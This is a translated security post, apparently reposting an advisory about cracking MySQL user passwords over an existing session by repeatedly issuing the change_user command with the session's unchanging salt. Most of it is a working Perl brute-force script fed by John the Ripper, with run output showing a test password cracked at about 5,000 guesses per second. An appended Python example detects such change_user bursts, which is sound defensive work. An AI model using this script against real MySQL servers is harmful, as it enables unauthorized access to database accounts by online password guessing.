Fast and efficient hacking of MySQL local and remote passwords


Http://www.kankanews.com/ICkengine/archives/212.shtml

Fast MySQL local and remote password cracking! First, a word to the database maintainers: there is no need to be nervous and you do not have to fix this; it looks like a small mistake.

I found a way to crack MySQL user passwords very efficiently, for both local users and users who connect over the network. In my test, 5,000 passwords per second were tested over the network.

Here's how:

The attacker logs on to the MySQL server with an unprivileged account. MySQL has a command called change_user which, as the name suggests, changes the user within an existing MySQL session. Because this command executes very quickly, it can be used to test passwords rapidly instead of reconnecting to the MySQL server for every attempt.

Why is the usual approach so slow?

When the change_user command is used, the salt does not change (which is a weakness). With the usual approach of reconnecting for each guess, the server sends a different salt every time a connection is made.

The Perl script below takes its candidate passwords from John the Ripper:

The test user is Crackme and the password is pass; it is cracked within a few seconds.

(approximately 20 seconds to test 100,000 passwords)

The test script is as follows:
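use Net::MySQL;

$| = 1;    # unbuffered output

# Log in once with the unprivileged account
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'Test',
    user     => "User",
    password => "Secret",
    debug    => 0,
);

$crackuser = "Crackme";

# Candidate passwords arrive one per line on standard input
while (<stdin>) {
    chomp;
    $currentpass = $_;

    # Payload: target user, then "\x14" (length 20) and the candidate
    # scrambled with the salt of the already-open connection
    $VV = join "",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "";
    # "\x11" is the change_user command byte
    if ($mysql->_execute_command("\x11", $VV) ne undef) {
        print "[*] cracked! --> $currentpass\n";
        exit;
    }
}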

Here are the results of running it on my machine:
C:\users\kingcope\desktop>c:\users\kingcope\desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning:maxlen = 8 is too large for the current hash type, reduced to 5
words:16382 time:0:00:00:02 w/s: 6262 current:citch
words:24573 time:0:00:00:04 w/s: 4916 current:rap
words:40956 time:0:00:00:07 w/s: 5498 current:matc3
words:49147 time:0:00:00:09 w/s: 5030 current:4429
words:65530 time:0:00:00:12 w/s: 5354 current:ch141
words:73721 time:0:00:00:14 w/s: 5021 current:v3n
words:90104 time:0:00:00:17 w/s: 5277 current:pun2
[*] cracked! --> Pass
words:98295 time:0:00:00:18 w/s: 5434 current:43gs

Session aborted
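
On the defensive side, the behaviour described above shows up as a long run of change_user commands (command byte 0x11) on a single connection. The following Python is an added example, not part of the original post: it parses a client-to-server MySQL packet stream and reports when one connection exceeds a rate limit. The function names, the threshold and window values, and the sample traffic are assumptions constructed for illustration.

```python
from collections import deque

COM_QUERY = 0x03
COM_CHANGE_USER = 0x11  # the "\x11" command byte sent by the script above


def client_commands(stream: bytes):
    """Yield the command byte of every command packet in a client-to-server
    MySQL byte stream: 3-byte little-endian length, 1-byte sequence id, payload."""
    off = 0
    while off + 4 <= len(stream):
        length = int.from_bytes(stream[off:off + 3], "little")
        seq = stream[off + 3]
        payload = stream[off + 4:off + 4 + length]
        if len(payload) < length:
            break  # truncated capture, stop parsing
        if seq == 0 and payload:  # a new command always restarts at sequence 0
            yield payload[0]
        off += 4 + length


def first_burst(timed_chunks, threshold=20, window=1.0):
    """timed_chunks: (timestamp_seconds, whole-packet bytes) from ONE connection.
    Return the timestamp at which `threshold` COM_CHANGE_USER commands were
    seen within `window` seconds, or None. Both limits are assumed values."""
    recent = deque()
    for ts, chunk in timed_chunks:
        for cmd in client_commands(chunk):
            if cmd != COM_CHANGE_USER:
                continue
            recent.append(ts)
            while ts - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                return ts
    return None


def packet(cmd: int, body: bytes = b"") -> bytes:
    """Build one constructed sample packet (sequence id 0)."""
    payload = bytes([cmd]) + body
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


# Constructed traffic: a pooled application that resets its session once a
# second, and a connection issuing 5,000 change_user commands per second.
pooled = [(float(i), packet(COM_CHANGE_USER, b"app\0") + packet(COM_QUERY, b"SELECT 1"))
          for i in range(60)]
guessing = [(i / 5000, packet(COM_CHANGE_USER, b"crackme\0")) for i in range(200)]
```

On TLS-protected connections the packets are not readable on the wire, so the same per-connection count has to come from server-side telemetry instead.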
